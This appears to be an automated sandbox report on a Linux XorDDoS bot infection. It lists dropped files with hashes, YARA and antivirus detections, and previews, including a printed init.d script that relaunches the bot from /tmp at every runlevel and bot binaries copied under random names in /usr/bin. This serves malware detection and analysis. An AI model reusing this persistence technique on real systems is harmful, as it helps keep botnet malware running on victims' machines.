                                                                                Entropy (8bit):4.630597512302597
                                                                                Encrypted:false
                                                                                SSDEEP:48:ZuW66FySAwoGz2u27ZGmx/Vtn2UE6UJ/Vtn2UE6Uz/Vtn2UE6U8qD/Vtn2UE6UM:3F/oGH27x0UEj0UEZ0UEXJ0UEM
                                                                                MD5:FA15F7D3BBE8EB3EDBBF0FCABF83A72A
                                                                                SHA1:F66CBEECD4C455269F8B6BCC4637166AA5AB1B35
                                                                                SHA-256:FF48CC0C575863D629D95F702438D98606BAF5D1D72D2E97A530EF090F72C856
                                                                                SHA-512:9192C7E4AEFD794B771188BE6AFAD447ADCCF5C03802F873C11A80DCDDE4282782CF6B9D6F85ABE32131C9FBB02492441E661CF4CC1E849457F5766441CD9B1F
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview: TARGETS = rsyslog unattended-upgrades open-vm-tools lvm2-lvmetad uuidd lxd lvm2-lvmpolld lxcfs 4ljhdTTyiA killprocs binfmt-support apport atd mdadm speech-dispatcher hddtemp kerneloops dbus irqbalance single whoopsie rsync ssh acpid lightdm bluetooth avahi-daemon cups-browsed cups saned plymouth grub-common ondemand rc.local.INTERACTIVE =.atd: rsyslog.mdadm: rsyslog.speech-dispatcher: rsyslog.hddtemp: rsyslog.kerneloops: rsyslog.dbus: rsyslog.irqbalance: rsyslog.single: killprocs 4ljhdTTyiA.whoopsie: rsyslog.rsync: rsyslog.ssh: rsyslog.acpid: rsyslog.lightdm: dbus acpid.bluetooth: rsyslog dbus.avahi-daemon: dbus rsyslog.cups-browsed: rsyslog.cups: rsyslog.saned: rsyslog dbus.plymouth: atd rsyslog mdadm unattended-upgrades open-vm-tools cups-browsed lvm2-lvmetad uuidd speech-dispatcher lxd hddtemp kerneloops lightdm dbus bluetooth irqbalance lvm2-lvmpolld avahi-daemon lxcfs 4ljhdTTyiA cups saned whoopsie rsync ssh acpid binfmt-support apport.grub-common: atd rsyslog mdadm unattended-upg
                                                                                /etc/init.d/.depend.stop
                                                                                Process:/usr/lib/insserv/insserv
                                                                                File Type:ASCII text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):1610
                                                                                Entropy (8bit):4.516460748225626
                                                                                Encrypted:false
                                                                                SSDEEP:48:sunrBs1G4GJ/2T2UKGj2zO2K2UPOiNQh/iHFn2U5wT:RmiUBGZUNcU0
                                                                                MD5:A500BBD292081FED6B9DF10B3901E52C
                                                                                SHA1:F217DE8F14A9AC9C2C780E7D06AD1703DD72FE27
                                                                                SHA-256:A21A278B94D0B20DCEF6B1A9D87815BB09D2A2BEA0635C9B3BC2C1019DA02685
                                                                                SHA-512:DEC79DAAAA2A2699F17AB0EEDF5C8F10BE62FC900A94FFC66C5C3FA6B141AA77399A926808575F244C9F96D0CEAB7B045417475D2EF4220CFBE4820539F8FE0C
                                                                                Malicious:true
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: TARGETS = anacron cron unattended-upgrades open-vm-tools lvm2-lvmetad uuidd lxd lvm2-lvmpolld lxcfs atd mdadm resolvconf speech-dispatcher hddtemp alsa-utils kerneloops irqbalance ufw whoopsie lightdm bluetooth cups-browsed cups saned plymouth open-iscsi urandom avahi-daemon iscsid sendsigs rsyslog umountnfs.sh hwclock.sh networking umountfs cryptdisks cryptdisks-early umountroot mdadm-waitidle halt reboot.avahi-daemon: cups-browsed saned.iscsid: open-iscsi.sendsigs: atd mdadm open-iscsi unattended-upgrades open-vm-tools cups-browsed plymouth uuidd speech-dispatcher lxd hddtemp iscsid alsa-utils kerneloops lightdm bluetooth irqbalance avahi-daemon lxcfs.rsyslog: atd mdadm sendsigs cups-browsed speech-dispatcher hddtemp kerneloops bluetooth irqbalance avahi-daemon cups saned whoopsie.umountnfs.sh: atd unattended-upgrades open-vm-tools rsyslog cups-browsed plymouth uuidd speech-dispatcher lxd hddtemp sendsigs alsa-utils kerneloops lightdm bluetooth irqbalance avahi-daemon lxcfs.hwclock.s
                                                                                /etc/init.d/4ljhdTTyiA
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                Category:dropped
                                                                                Size (bytes):315
                                                                                Entropy (8bit):5.289870953048193
                                                                                Encrypted:false
                                                                                SSDEEP:6:hUtoFdU9wmBsKheJMTsfGBE21YJvmNeMwhGLsmv1DzRIbP6Mzmn4:6eBMQfGBEMO1GLsQzubPzm4
                                                                                MD5:B963E3CC9D56AFCE572013F2BE246041
                                                                                SHA1:FD14A91ED5ECB9784BAB8BB3DB933D8328B39692
                                                                                SHA-256:8551E0AA71C58E50081AF7A834911D453D89539930E2C875152460E08E462C78
                                                                                SHA-512:2B2078A2997101B8A555A202DF1D8D467F669F506176705F16E92E01A00ACD392FDA971377D90C403DE3984EC009A0F4231134318923712E64ED72CF9E71C2AA
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview: #!/bin/sh.# chkconfig: 12345 90 90.# description: 4ljhdTTyiA.### BEGIN INIT INFO.# Provides:..4ljhdTTyiA.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.4ljhdTTyiA.### END INIT INFO.case $1 in.start)../tmp/4ljhdTTyiA..;;.stop)..;;.*)../tmp/4ljhdTTyiA..;;.esac.
                                                                                /etc/sed4RcMLw
                                                                                Process:/bin/sed
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):722
                                                                                Entropy (8bit):4.7770063668556455
                                                                                Encrypted:false
                                                                                SSDEEP:12:NfF0mvSjmKrOubZklQaiFq5xkF0/MAkLez/A70Ep7z/A0lcz/Aavn:Nt0majmKrOUYiGkF0UAkCz/A4Ep7z/AP
                                                                                MD5:8F111D100EA459F68D333D63A8EF2205
                                                                                SHA1:077CA9C46A964DE67C0F7765745D5C6F9E2065C3
                                                                                SHA-256:0E5C204385B21E15B031C83F37212BF5A4EE77B51762B7B54BD6AD973EBDF354
                                                                                SHA-512:D81767B47FB84AAF435F930356DED574EE9825EC710A2E7C26074860D8A385741D65572740137B6F9686C285A32E2951CA933393B266746988F1737AAD059ADB
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: # /etc/crontab: system-wide crontab.# Unlike any other crontab you don't have to run the `crontab'.# command to install the new version when you edit this file.# and files in /etc/cron.d. These files also have username fields,.# that none of the other crontabs do...SHELL=/bin/sh.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..# m h dom mon dow user.command.17 *.* * *.root cd / && run-parts --report /etc/cron.hourly.25 6.* * *.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ).47 6.* * 7.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ).52 6.1 * *.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ).#.
                                                                                /lib/libudev.so
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625889
                                                                                Entropy (8bit):6.2444373366686925
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1Au:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91l
                                                                                MD5:349456ECAA1380A142F15810A8260378
                                                                                SHA1:02DD15ECDEEDEFD7A2F82BA0DF38703A74489AF3
                                                                                SHA-256:0F00C2E074C6284C556040012EF23357853CCAC4AD1373D1DEA683562DC24BCA
                                                                                SHA-512:85D5DAD44636F240BE2943BC1E2EA0196AF08EE778C4EBE055C237DFFDC291EE34C4EEDAFC70D0C6DC6D8CDF2C48D1E296CF65C6BCBAA37E59FA276773961F0C
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /lib/libudev.so, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /lib/libudev.so, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: Metadefender, Detection: 65%, Browse
                                                                                • Antivirus: ReversingLabs, Detection: 72%
                                                                                Reputation:low
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /run/gcc.pid
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):32
                                                                                Entropy (8bit):3.890319531114783
                                                                                Encrypted:false
                                                                                SSDEEP:3:E/Pp0ERvnQ6kU:E/R9H7
                                                                                MD5:0FDDCC1ED86DC3067281434DB6D8A692
                                                                                SHA1:29CCBB10465F58731D0AD67D0E01094D6E550F03
                                                                                SHA-256:D837476746664141D23722D209103994FDD49A76D6B0C5CC80700C84225DC450
                                                                                SHA-512:068D58F831CC167900E229A7B7C26653030894E0BD994D57782FAD41D0D60BEFBB25274979910173600F561EA7AB325951F9ED4794EDC2BE92640741ECB9DD6B
                                                                                Malicious:false
                                                                                Preview: gwbbeuannjaetwafyolmnmkmuwlnwvcf
                                                                                /usr/bin/aspbnnkmso
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.244464032725729
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91T
                                                                                MD5:1D6FD0EB72068B2C5F4C00B6BD4CCCE7
                                                                                SHA1:32AB444D86D252039652BCC5C04AFE904135589D
                                                                                SHA-256:A40FE48FFA2682CAAC809C529518B31BC562D1D3C7C5D2D19C870258850B6504
                                                                                SHA-512:FE8EC9F94E0F5FB637EE8EF96C26A595DFC2E12E07BBA6C047D2ACBFC0EBAFE97552C699F81FB2741ED802A049D1ABF6766DDE76EDFE07D21B263326F61CC16A
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/aspbnnkmso, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/aspbnnkmso, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/ctrygxclrx
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.244457415710082
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1Ar:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91+
                                                                                MD5:039A6ECEAFDBF298AC52C2A12463D087
                                                                                SHA1:D75D35BAB7EB56C33CB76B88D50304584FD4DBA5
                                                                                SHA-256:C40F22454C768EED45923A4916F5480A39EB2C93C2C9911681891FC63F40E26B
                                                                                SHA-512:5241DB20701178228DF0E3BE251CA5D50187E8B49F9EE17155B2B55B2318183262CB3BCF85134586666F9DD2A0202377BDF89E76560343A7BE8409A6EE4DEA79
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ctrygxclrx, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ctrygxclrx, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/dxeguomyxc
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.244462815955286
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1AV:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91k
                                                                                MD5:066CAA157C95FAA9D8D81929F8157D3A
                                                                                SHA1:D2BBF4C0B60513CA08BF4F68A15A2FCE79F41E1D
                                                                                SHA-256:7B35D00B6E49C7AE367089CFED0E4272EE303AEBAD1C58D58C1928D6BC8DAAD1
                                                                                SHA-512:22F6CD8558885EAEF22A7951673F300699DB48337B8095DD4D3E7798AD20DB7FEA4E13870F220240919F8854AC45090E27EBB4587DBF3F6A52C61930C14A71B9
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/dxeguomyxc, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/dxeguomyxc, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/fcxqfstrdm
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.244469232854971
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1Aw:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91R
                                                                                MD5:E45D3C3CEB20CB21CECDF27ABB364096
                                                                                SHA1:D8A306A796091A6FDEBBC99ECE00038E281C8FB6
                                                                                SHA-256:C8F1B348B568A2600FE9E64BCCF2B5D065FAE13FA73691C487F175785C932537
                                                                                SHA-512:B309F9AED1980C04F3AA480046FBF2F11D581F58807AAA31309ECCD76CFCA466C579B5EBC3B75E102B4FCA2D3CE4523F6E98A79AEDE31A21FFC93B9416000F04
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/fcxqfstrdm, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/fcxqfstrdm, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/gqczobuacc
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.244476302793986
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1AM:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91R
                                                                                MD5:C098C27688A125D5CFA970AE835E1EDA
                                                                                SHA1:38D7BD449129CA6270446421AF502E40E2C7A0D6
                                                                                SHA-256:98FF8E03F1221EB11E575FE5990B734DD43C8E889A7119EA9A6068DB2B406283
                                                                                SHA-512:92E2006043E1110302A995B4FBCD1968B13AE2DA6FD3583CA54489A870EF439C7C92A0291A92D64CD2D23EA8E7D16E37F3EC7F4DA8D14BBE32FE38AF9564A4E4
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/gqczobuacc, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/gqczobuacc, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/jjltawydwf
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.244466129353984
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1At:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91E
                                                                                MD5:8031CB3D4FE5BA13E55BE0286E251729
                                                                                SHA1:E527A32F093939F01310092B06F7B8B56AF32E78
                                                                                SHA-256:8588C3A98B3A93904D92264C14C7ACB840F45E2382A2999FD3EAF8A88CC32788
                                                                                SHA-512:83F35709D7FE67A167B6C95542CF19FD6B690232CEF1A2C54D5E7EA8AF5CB4C23A0965C231C6403E3497B068747FB0EE52D28DAE5DBD828101F525892B606FB2
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/jjltawydwf, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/jjltawydwf, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/lgnmbyzzlq
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.2444746239615965
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1A9:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/914
                                                                                MD5:54D3B5B40DB4C72EAD6A4D36581F0413
                                                                                SHA1:505B356CB203FDABE72C0318FA86419F4EAE4542
                                                                                SHA-256:ACFD8B1F8BE0265A2E8AAD8CA6205C80926F785C745BC3DC0929DF177AA130D6
                                                                                SHA-512:8F735A219F3115A9F9E3F99551EFA05790456A1D7C525E7CBA0E84503B040E714BE1757AA7C2341CC83A46C755CA5DED7C1A1E7C28443BE2C3D57AE9CF7EFF25
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/lgnmbyzzlq, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/lgnmbyzzlq, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/nyavevzqtw
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):589824
                                                                                Entropy (8bit):6.151734957445122
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEo:FBXmkN/+Fhu/Qo4h9L+zNNIBVEo
                                                                                MD5:7C4EB27A2217093846FA00CEACD95628
                                                                                SHA1:5B6F5969022E381D1641418E7B0859D85AF440D3
                                                                                SHA-256:2F547BF5D7487B41AA062D6721254DAE51684A4EC4E276FF7296F1371D0C0D93
                                                                                SHA-512:E524C983A653EDC1660BF61029E824180511C8500260470D4996A867708083FD2C1B98CB1F10E50C71FEA1B48670A0B6B94DD9E959613724C66B985636E209F8
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/nyavevzqtw, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/ouhdchrbdz
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.244472542306856
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1As:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91J
                                                                                MD5:464EE2D18FACAFA159F9948AB174135C
                                                                                SHA1:6D823B381A4E81EE824B1E0509CA04D5F289D903
                                                                                SHA-256:5BB0A143204BAD0F7ADAB4951A81172E500BC0DEACA25E235595A51880300774
                                                                                SHA-512:1E2B15939C08B22F3D1462DFDC902BE094479F3E6BC0F65F25202B8100D31D9EA80D9AEE798C7B5601BC4588F7EB260D5514968F74EC5632F9301C6EA49F7D7F
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ouhdchrbdz, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ouhdchrbdz, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
